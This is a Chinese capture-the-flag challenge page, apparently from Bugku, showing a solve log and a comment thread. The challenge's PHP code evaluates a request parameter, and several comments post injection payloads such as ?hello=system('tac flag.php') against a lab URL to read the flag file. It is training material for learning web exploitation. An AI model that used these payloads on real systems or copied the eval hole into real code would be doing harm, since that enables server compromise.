评分(10)
解题动态
uiu 攻破了该题 4小时前
Rencj 攻破了该题 7小时前
无情的白给机器人 攻破了该题 8小时前
大奇 攻破了该题 9小时前
神逆流·神里绫华 攻破了该题 11小时前
小鱼板板 攻破了该题 11小时前
kiritoldws 攻破了该题 13小时前
chenzhong 攻破了该题 1天前
gusto. 攻破了该题 1天前
z2l1 攻破了该题 1天前
多斯Nico 攻破了该题 1天前
13522765614 攻破了该题 1天前
等往事风中吹‘ 攻破了该题 2天前
evilk 攻破了该题 2天前
kim66 攻破了该题 2天前
flag大王 攻破了该题 2天前
66744565 攻破了该题 2天前
3373441596 攻破了该题 2天前
pengyu 攻破了该题 2天前
评论
Hacker23 5年前
举报
http://114.67.246.176:10183/?hello=system('tac flag.php')
ZTyyds 4年前
举报
原理是什么啊???想了解一下
guoguo 5年前
举报
题目内容:<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> 可以使用hello=system('tac flag.php')或者?hello=10/print_r(file("flag.ph
dsadscxzewq 4年前
举报
为啥用cat不行呢?
痕夕 5年前
举报
看不懂,求解,大佬
SwBack 5年前
举报
大道至简,直接当作一句话利用即可 hello=system('tac flag.php')
巨人肩膀上的矮子 4年前
举报
@dsadscxzewq cat是可以的,只不过在源代码里查看
dsadscxzewq 4年前
举报
为啥用cat不行呢?
BBBugku 5年前
举报
F12查看源代码,且根据题目描述可以得知flag在flag.php文件中,且在源代码中发现hello并未赋值,因此只需在原有的url后添加 /?hello=10/print_r(file("flag.php")) ,刷新网页,找到flag。
krystalll 4年前
举报
感谢
lurnco 5年前
举报
Too young Too simple
Discuze奇 5年前
举报
我的金币不太允许了呀。。。
lurnco 5年前
举报
可以创个小号做后面的题人?
1amer 5年前
举报
直接读文件吧
你听说过呆呆吗? 5年前
举报
只有我一个人知道bugku更新了吗
storn 5年前
举报
我也是刚发现,而且,我原来的号好像没了,o(╥﹏╥)o